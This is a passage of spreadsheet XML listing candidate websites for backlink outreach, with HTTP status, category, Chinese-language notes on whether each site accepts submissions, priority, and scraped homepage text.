        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K370" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L370" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M370" s="19" t="str">
        <x:v>https://www.crazylaura.com/</x:v>
      </x:c>
      <x:c r="N370" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O370" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P370" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q370" s="21" t="str">
        <x:v>Fun DIY Projects &amp; More! Crazy Laura - Fun DIY Projects &amp; More! Crazy Laura Menu Bullet Journal Printables Home Decor Recipes Write for Us How to Protect Your Online Privacy in an Online World 5 things I wish I’d known before moving into a new home 12+ Lip-Smacking BBQ Shrimp Recipes Perfect for Sunny Backyard Dinners Latest Bullet Journal Posts Creating Travel Journals That Capture More Than Just Photos Minimalist Journaling: How to Keep a Notebook You’ll Actually Use 15+ Creative Bullet Journal Weekly Spread Ideas To Try This Week! More Posts from this Category Latest Printables 10 Free 4th of July Coloring Pages For Patriotic Summer Fun 10 Free Father’s Day Coloring Pages To Print and Gift! Sweet Mother’s Day Col</x:v>
      </x:c>
      <x:c r="R370" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S370" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T370" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://crazylaura.com</x:v>
      </x:c>
    </x:row>
    <x:row r="371">
      <x:c r="A371" s="18" t="str">
        <x:v>370</x:v>
      </x:c>
      <x:c r="B371" s="19" t="str">
        <x:v>popsugar.com</x:v>
      </x:c>
      <x:c r="C371" s="19" t="str">
        <x:v>https://popsugar.com</x:v>
      </x:c>
      <x:c r="D371" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E371" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F371" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G371" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H371" s="19" t="str">
        <x:v>https://www.popsugar.com/</x:v>
      </x:c>
      <x:c r="I371" s="19" t="str">
        <x:v>PS</x:v>
      </x:c>
      <x:c r="J371" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K371" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L371" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M371" s="19" t="str">
        <x:v>https://www.popsugar.com/</x:v>
      </x:c>
      <x:c r="N371" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O371" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P371" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q371" s="21" t="str">
        <x:v>PS makes wellness more accessible through real-life stories, first-person perspectives, and expert-backed information. Our staff of journalists and subject-matter experts research, report, and produce articles, videos, and social content that help people feel good about their well-being choices, no matter what they are. Via our core verticals — Health, Fitness, Beauty, Balance, Identity, and Shopping — we help our audience proceed with confidence. PS Skip to main content Check us out on social Follow Popsugar on Instagram. Follow Popsugar on TikTok. Subscribe to Popsugar on YouTube. Follow Popsugar on Pinterest. Popsugar Navigation Health Nutrition Mental Health Sleep Condition Center Nutrition Center Breast Cancer Center Fitness Workouts Running Sports Fitness Videos For the W The Rally Report Beauty Skin Care Nails Hair Makeup Reviews Skinposium Lifestyle Sex Relationships Parenting Financial Health Home Rest Stop Parenting The Back-to-School Reset Parents in Progress Identity Crowned Juntos Where I'm From Out Loud Shopping Beauty Fitness Fashion Home Gift Guides Product Reviews Subscribe Go to Navigation Popsugar Subscribe Go to Na</x:v>
      </x:c>
      <x:c r="R371" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S371" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T371" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://popsugar.com</x:v>
      </x:c>
    </x:row>
    <x:row r="372">
      <x:c r="A372" s="18" t="str">
        <x:v>371</x:v>
      </x:c>
      <x:c r="B372" s="19" t="str">
        <x:v>tumblr.com</x:v>
      </x:c>
      <x:c r="C372" s="19" t="str">
        <x:v>https://tumblr.com</x:v>
      </x:c>
      <x:c r="D372" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E372" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F372" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G372" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H372" s="19" t="str">
        <x:v>https://www.tumblr.com/</x:v>
      </x:c>
      <x:c r="I372" s="19" t="str">
        <x:v>Tumblr</x:v>
      </x:c>
      <x:c r="J372" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K372" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L372" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M372" s="19" t="str">
        <x:v>https://www.tumblr.com/</x:v>
      </x:c>
      <x:c r="N372" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O372" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P372" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q372" s="21" t="str">
        <x:v>Tumblr is the place you go to be yourself on the internet. No performance, no perfection. Just you, and the people who get it. Tumblr Explore Communities Change palette Sign up Log in Trending Staff Picks Videos More About Apps Legal Privacy Help</x:v>
      </x:c>
      <x:c r="R372" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S372" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T372" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://tumblr.com</x:v>
      </x:c>
    </x:row>
    <x:row r="373">
      <x:c r="A373" s="18" t="str">
        <x:v>372</x:v>
      </x:c>
      <x:c r="B373" s="19" t="str">
        <x:v>mommyevolution.com</x:v>
      </x:c>
      <x:c r="C373" s="19" t="str">
        <x:v>https://mommyevolution.com</x:v>
      </x:c>
      <x:c r="D373" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E373" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F373" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G373" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H373" s="19" t="str">
        <x:v>https://mommyevolution.com/</x:v>
      </x:c>
      <x:c r="I373" s="19" t="str">
        <x:v>Home - Mommy Evolution</x:v>
      </x:c>
      <x:c r="J373" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K373" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L373" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M373" s="19" t="str">
        <x:v>https://mommyevolution.com/</x:v>
      </x:c>
      <x:c r="N373" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O373" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P373" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q373" s="21" t="str">
        <x:v>Home - Mommy Evolution Skip to content Home Parenting Parenting Tips Age Appropriate Toys Potty Training Tips Special Needs Parenting ADHD Dyslexia Sensory Processing Disorder Family Activities Kids Crafts Sensory Activities Printable Activities Education SEL Printable Activities for Kids Unit Studies Children’s Reading Lists Preschool Learning to Read Books for Kids Best New Books for Kids Children’s Books Lists Board Books for Toddlers Teen Reads Summer Reading Lists (K-8) Recipes Dinner Recipes Beef Recipes Chicken Recipes Fish and Seafood Recipes Pasta Recipes Pork Recipes Salad Recipes Soups, Stew and Chili Recipes Soup Recipes Side Dishes Lunch Recipes Dessert Recipes Cake Recipes Cook</x:v>
      </x:c>
      <x:c r="R373" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S373" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T373" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mommyevolution.com</x:v>
      </x:c>
    </x:row>
    <x:row r="374">
      <x:c r="A374" s="18" t="str">
        <x:v>373</x:v>
      </x:c>
      <x:c r="B374" s="19" t="str">
        <x:v>momooze.com</x:v>
      </x:c>
      <x:c r="C374" s="19" t="str">
        <x:v>https://momooze.com</x:v>
      </x:c>
      <x:c r="D374" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E374" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F374" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G374" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H374" s="19" t="str">
        <x:v>https://www.momooze.com/</x:v>
      </x:c>
      <x:c r="I374" s="19" t="str">
        <x:v>Momooze | Lifestyle Magazine For Women</x:v>
      </x:c>
      <x:c r="J374" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K374" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L374" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M374" s="19" t="str">
        <x:v>https://www.momooze.com/</x:v>
      </x:c>
      <x:c r="N374" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O374" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P374" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q374" s="21" t="str">
        <x:v>Welcome to Momooze.com - your ultimate online destination for creative and inspiring ideas in home decor, fashion, food, and lifestyle! Momooze | Lifestyle Magazine For Women Skip to content Menu Menu Lifestyle Health &amp; Beauty Home Decor Adventures &amp; Travel Baby Shower Birthday Party Parties Bachelorette Party Party Food Bridal Shower Gender Reveal Graduation Party Kids Party Party Themes FREE GUIDES Bridal Shower Games Baby Shower Games Bachelorette Party Themes Party Planning Checklist Baby Shower Menus Shop Menu Lifestyle Health &amp; Beauty Home Decor Adventures &amp; Travel Baby Shower Birthday Party Parties Bachelorette Party Party Food Bridal Shower Gender Reveal Graduation Party Kids Party Party Themes FREE GUIDES Bridal Shower Games Baby Shower Games Bachelorette Party Themes Party Planning Checklist Baby Shower Menus Shop </x:v>
      </x:c>
      <x:c r="R374" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S374" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T374" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://momooze.com</x:v>
      </x:c>
    </x:row>
    <x:row r="375">
      <x:c r="A375" s="18" t="str">
        <x:v>374</x:v>
      </x:c>
      <x:c r="B375" s="19" t="str">
        <x:v>larger.io</x:v>
      </x:c>
      <x:c r="C375" s="19" t="str">
        <x:v>https://larger.io</x:v>
      </x:c>
      <x:c r="D375" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E375" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F375" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G375" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H375" s="19" t="str">
        <x:v>https://larger.io/</x:v>
      </x:c>
      <x:c r="I375" s="19" t="str">
        <x:v>LargerIO</x:v>
      </x:c>
      <x:c r="J375" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K375" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L375" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M375" s="19" t="str">
        <x:v>https://larger.io/</x:v>
      </x:c>
      <x:c r="N375" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O375" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P375" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q375" s="21" t="str">
        <x:v>Discover the technologies behind 15,345,716 websites. Browse 7,212 technologies across 108 categories. LargerIO Uncovers the technologies used on websites - Larger larger io Technologies Trending Developers Sign in Start for free Web technology intelligence Uncover the stack behind any website. Analytics, CMS, frameworks, hosting, payments — detected across 15.3M domains, refreshed every day. Look up Try stripe.com github.com airbnb.com openai.com spotify.com S stripe.com 15 technologies detected · lang en live JavaScript frameworks 2 Re React ↗ Ne Next.js ↗ Payment processors 1 St Stripe ↗ CDN 1 Cf Cloudflare ↗ + 11 more in 8 categories See full report → Most used on the web ← → #1 jQuery JavaScript libraries 4.9M sites #2 PHP Programming languages 4.4M sites #3 HTTP/3 Miscellaneous 3.7M sit</x:v>
      </x:c>
      <x:c r="R375" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S375" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T375" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://larger.io</x:v>
      </x:c>
    </x:row>
    <x:row r="376">
      <x:c r="A376" s="18" t="str">
        <x:v>375</x:v>
      </x:c>
      <x:c r="B376" s="19" t="str">
        <x:v>homanathome.com</x:v>
      </x:c>
      <x:c r="C376" s="19" t="str">
        <x:v>https://homanathome.com</x:v>
      </x:c>
      <x:c r="D376" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E376" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F376" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G376" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H376" s="19" t="str">
        <x:v>https://homanathome.com/</x:v>
      </x:c>
      <x:c r="I376" s="19" t="str">
        <x:v>Home | Homan at Home</x:v>
      </x:c>
      <x:c r="J376" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K376" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L376" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M376" s="19" t="str">
        <x:v>https://homanathome.com/</x:v>
      </x:c>
      <x:c r="N376" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O376" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P376" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q376" s="21" t="str">
        <x:v>Family-friendly recipes and engaging kid crafts with simple ingredients and techniques are here to help you bring happiness to your home! Home | Homan at Home Skip to content Home Recipe Index Craft Index About Shop browse by category Recipe Index Craft Index Activities Index Shop I want to Cook I want to Bake I want to Craft I want to Play Subscribe to receive a FREE 6 day freezer meal plan! Type your email… Subscribe Super Simple, Family Friendly Recipes Short on time? Budget got you down? These recipes are designed to be budget-friendly, easy, quick, and, above all, kid-friendly! Check them out here: Breakfast EAsy Dinner Baking Bread No Bake Slow Cooker Search see all Recipes As seen in: Meet the author Hello! I’m Diane! Hi! I’m Diane Homan, creator of Homan at Home! I love cooking and baking, and I really, really love pho</x:v>
      </x:c>
      <x:c r="R376" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S376" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T376" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://homanathome.com</x:v>
      </x:c>
    </x:row>
    <x:row r="377">
      <x:c r="A377" s="18" t="str">
        <x:v>376</x:v>
      </x:c>
      <x:c r="B377" s="19" t="str">
        <x:v>widgeo.net</x:v>
      </x:c>
      <x:c r="C377" s="19" t="str">
        <x:v>https://widgeo.net</x:v>
      </x:c>
      <x:c r="D377" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E377" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F377" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G377" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H377" s="19" t="str">
        <x:v>https://widgeo.net/</x:v>
      </x:c>
      <x:c r="I377" s="19" t="str">
        <x:v>WIDGEO - Real-Time Geo Analytics</x:v>
      </x:c>
      <x:c r="J377" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K377" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L377" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M377" s="19" t="str">
        <x:v>https://widgeo.net/</x:v>
      </x:c>
      <x:c r="N377" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O377" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P377" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q377" s="21" t="str">
        <x:v>Premium real-time traffic counters with live audience activity, geolocation insights, animated statistics, and multiple visual themes. WIDGEO - Real-Time Geo Analytics WIDGEO GeoCountry v4 GeoCountry v3 Since 2005 Real-time widgets Global traffic insights 3,231,842 active users © 2005 - 2026 Widgeo.net About Contact Privacy Terms</x:v>
      </x:c>
      <x:c r="R377" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S377" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T377" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://widgeo.net</x:v>
      </x:c>
    </x:row>
    <x:row r="378">
      <x:c r="A378" s="18" t="str">
        <x:v>377</x:v>
      </x:c>
      <x:c r="B378" s="19" t="str">
        <x:v>earthfriendlytips.com</x:v>
      </x:c>
      <x:c r="C378" s="19" t="str">
        <x:v>https://earthfriendlytips.com</x:v>
      </x:c>
      <x:c r="D378" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E378" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F378" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G378" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H378" s="19" t="str">
        <x:v>https://earthfriendlytips.com/</x:v>
      </x:c>
      <x:c r="I378" s="19" t="str">
        <x:v>Earth Friendly Tips - Helping you on your journey toward sustainable living</x:v>
      </x:c>
      <x:c r="J378" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K378" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L378" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M378" s="19" t="str">
        <x:v>https://earthfriendlytips.com/</x:v>
      </x:c>
      <x:c r="N378" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O378" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P378" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q378" s="21" t="str">
        <x:v>At Earth Friendly Tips, you'll learn all the simple tips and tricks you need to know to take care of the environment and live a more eco-friendly life. Earth Friendly Tips - Helping you on your journey toward sustainable living Skip to content Earth Friendly Tips About Me Contact Categories DIY Cleaning Eco-Friendly Holidays Eco-Friendly Living Gardening Herbalism Homesteading Natural Health and Beauty Recipes Disclosure and Disclaimer Privacy Policy Shop Cart Gifts/Home Decor Printable/Digital Products Earth Friendly Tips Eco-Friendly Holidays | Homesteading Homemade Gifts You Can Make on Your Homestead By Kristen August 30, 2026 August 30, 2026 45 Homemade Gifts You Can Make on Your Homestead If you’ve been searching for homemade homestead gifts, you’re in the right place. I love this time of year because it feels like the perfect moment </x:v>
      </x:c>
      <x:c r="R378" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S378" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T378" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://earthfriendlytips.com</x:v>
      </x:c>
    </x:row>
    <x:row r="379">
      <x:c r="A379" s="18" t="str">
        <x:v>378</x:v>
      </x:c>
      <x:c r="B379" s="19" t="str">
        <x:v>lkmakhlakulkarimah.co.id</x:v>
      </x:c>
      <x:c r="C379" s="19" t="str">
        <x:v>https://lkmakhlakulkarimah.co.id</x:v>
      </x:c>
      <x:c r="D379" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E379" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F379" s="20"/>
      <x:c r="G379" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H379" s="19" t="str"/>
      <x:c r="I379" s="19" t="str"/>
      <x:c r="J379" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K379" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L379" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M379" s="19" t="str">
        <x:v>https://lkmakhlakulkarimah.co.id</x:v>
      </x:c>
      <x:c r="N379" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O379" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P379" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q379" s="21" t="str"/>
      <x:c r="R379" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S379" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T379" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://lkmakhlakulkarimah.co.id
http://lkmakhlakulkarimah.co.id</x:v>
      </x:c>
    </x:row>
    <x:row r="380">
      <x:c r="A380" s="18" t="str">
        <x:v>379</x:v>
      </x:c>
      <x:c r="B380" s="19" t="str">
        <x:v>eatsimply.co.uk</x:v>
      </x:c>
      <x:c r="C380" s="19" t="str">
        <x:v>https://eatsimply.co.uk</x:v>
      </x:c>
      <x:c r="D380" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E380" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F380" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G380" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H380" s="19" t="str">
        <x:v>https://eatsimply.co.uk/</x:v>
      </x:c>
      <x:c r="I380" s="19" t="str">
        <x:v>Eat Simply - Simple food</x:v>
      </x:c>
      <x:c r="J380" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K380" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L380" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M380" s="19" t="str">
        <x:v>https://eatsimply.co.uk/</x:v>
      </x:c>
      <x:c r="N380" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O380" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P380" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q380" s="21" t="str">
        <x:v>Simple food Eat Simply - Simple food Eat Simply Blog Eat Drink Foodie Things sustainable living Restaurant Reviews Contact Me Eat Drink Foodie Things Creating an Outdoor Kitchen that Works in Every Season A supermarket vs artisan pizza comparison challenge with East Pizzas A Christmas Gift Guide for the Foodie in Your Life Random Drug Testing Service Programs Portable vs. Fixed Monitors: Which Extra Screen Is Right for You? Plant-based concentrates: A deep dive Blog Creating an Outdoor Kitchen that Works in Every Season Most people pack away their grills the moment the month of September hits. I used to be that person, too. Then one chilly&amp;hellip; May 29, 2026 Leave a comment View Post Blog A supermarke</x:v>
      </x:c>
      <x:c r="R380" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S380" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T380" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://eatsimply.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="381">
      <x:c r="A381" s="18" t="str">
        <x:v>380</x:v>
      </x:c>
      <x:c r="B381" s="19" t="str">
        <x:v>picklebums.com</x:v>
      </x:c>
      <x:c r="C381" s="19" t="str">
        <x:v>https://picklebums.com</x:v>
      </x:c>
      <x:c r="D381" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E381" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F381" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G381" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H381" s="19" t="str">
        <x:v>https://picklebums.com/</x:v>
      </x:c>
      <x:c r="I381" s="19" t="str">
        <x:v>Easy Activities for Kids - Picklebums</x:v>
      </x:c>
      <x:c r="J381" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K381" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L381" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M381" s="19" t="str">
        <x:v>https://picklebums.com/</x:v>
      </x:c>
      <x:c r="N381" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O381" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P381" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q381" s="21" t="str">
        <x:v>Picklebums has lots of fun and easy activities for kids aged 2-10, and lots of printables, tips and tricks, to make life easier and more fun for everyone! Easy Activities for Kids - Picklebums Skip to content About contact Shop Our Printables! Activities for kids Art and Creativity Language and Literacy Math fine motor activities Holidays and Celebrations sensory play playdough dramatic play Gross Motor and Outdoor Play Science and Discovery music Cooking with Kids Free Printables Printables for Kids Holiday Printables Organising Printables Holidays &amp; Seasons Valentine’s Day Easter Halloween Christmas Spring Activities Summer Fall &amp; Autumn Winter Activities Life &amp; Family Family Food Organisation Parenting stories parenting tips &amp; hacks Shop Fun and Easy Activities for Kids! Whether you are a parent looking for fun ideas to keep your kids busy,</x:v>
      </x:c>
      <x:c r="R381" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S381" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T381" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://picklebums.com</x:v>
      </x:c>
    </x:row>
    <x:row r="382">
      <x:c r="A382" s="18" t="str">
        <x:v>381</x:v>
      </x:c>
      <x:c r="B382" s="19" t="str">
        <x:v>traciefobes.com</x:v>
      </x:c>
      <x:c r="C382" s="19" t="str">
        <x:v>https://traciefobes.com</x:v>
      </x:c>
      <x:c r="D382" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E382" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F382" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G382" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H382" s="19" t="str">
        <x:v>https://traciefobes.com/</x:v>
      </x:c>
      <x:c r="I382" s="19" t="str">
        <x:v>Tracie Fobes, Blogging Coach</x:v>
      </x:c>
      <x:c r="J382" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K382" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L382" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M382" s="19" t="str">
        <x:v>https://traciefobes.com/</x:v>
      </x:c>
      <x:c r="N382" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O382" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P382" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q382" s="21" t="str">
